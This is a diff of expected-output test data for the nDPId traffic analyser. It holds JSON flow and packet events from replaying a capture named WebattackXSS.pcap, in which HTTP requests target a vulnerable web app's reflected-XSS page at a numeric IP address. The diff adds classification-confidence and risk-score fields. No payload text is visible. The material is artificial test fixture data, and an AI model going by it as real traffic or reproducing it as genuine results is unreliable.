 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":3,"flow_last_seen":1499348006335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348006335,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NJpAAD4GkT6sEAABwKgKMoikAFAqsOqlKsH+wYAQAOWkDQAAAQEICgE83j0D5q+x"}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8623,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348002450,"flow_last_seen":1499348007347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499348007347,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8623,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348002450,"flow_last_seen":1499348007347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499348007347,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348007599,"flow_last_seen":1499348007599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348007599,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1499348007599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348007599,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+WFAAD4GzG6sEAABwKgKMoiyAFBEayYYAAAAAKACchCKyAAAAgQFtAQCCAoBPN95AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8628,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":2,"flow_last_seen":1499348007599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348007599,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiLJr5HteRGsmGaAScSDvkAAAAgQFtAQCCAoD5rDtATzfeQEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":3,"flow_last_seen":1499348007600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348007600,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+WJAAD4GzHWsEAABwKgKMoiyAFBEayYZa+R7X4AQAOWOmAAAAQEICgE833kD5rDt"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347877292,"flow_last_seen":1499347882869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347877292,"flow_last_seen":1499347882869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347877292,"flow_last_seen":1499347882869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347878568,"flow_last_seen":1499347883869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347878568,"flow_last_seen":1499347883869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347878568,"flow_last_seen":1499347883869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347881141,"flow_last_seen":1499347886869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347881141,"flow_last_seen":1499347886869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347881141,"flow_last_seen":1499347886869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347882404,"flow_last_seen":1499347887870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347882404,"flow_last_seen":1499347887870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347882404,"flow_last_seen":1499347887870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347883693,"flow_last_seen":1499347888870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347883693,"flow_last_seen":1499347888870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347883693,"flow_last_seen":1499347888870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348009895,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348010145,"flow_last_seen":1499348010145,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348010145,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1499348010145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348010145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81alAAD4G8CasEAABwKgKMojMAFACvDRcAAAAAKACchC7nQAAAgQFtAQCCAoBPOH1AAAAAAEDAwc="}
@@ -3538,27 +3538,27 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1499348019059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348019059,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bDdAAD4GWZmsEAABwKgKMokqAFBENIadAAAAAKACchAe0QAAAgQFtAQCCAoBPOqqAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":2,"flow_last_seen":1499348019059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348019059,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiSoKVvNnRDSGnqAScSBh7QAAAgQFtAQCCAoD5rweATzqqgEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":3,"flow_last_seen":1499348019059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348019059,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bDhAAD4GWaCsEAABwKgKMokqAFBENIaeClbzaIAQAOUA9QAAAQEICgE86qoD5rwe"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347886296,"flow_last_seen":1499347891872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347886296,"flow_last_seen":1499347891872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347886296,"flow_last_seen":1499347891872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347887572,"flow_last_seen":1499347892872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347887572,"flow_last_seen":1499347892872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347887572,"flow_last_seen":1499347892872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347890192,"flow_last_seen":1499347895873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347890192,"flow_last_seen":1499347895873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347890192,"flow_last_seen":1499347895873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347891536,"flow_last_seen":1499347896874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347891536,"flow_last_seen":1499347896874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347891536,"flow_last_seen":1499347896874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347894093,"flow_last_seen":1499347899875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347894093,"flow_last_seen":1499347899875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347894093,"flow_last_seen":1499347899875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347895396,"flow_last_seen":1499347900875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347895396,"flow_last_seen":1499347900875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348020086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
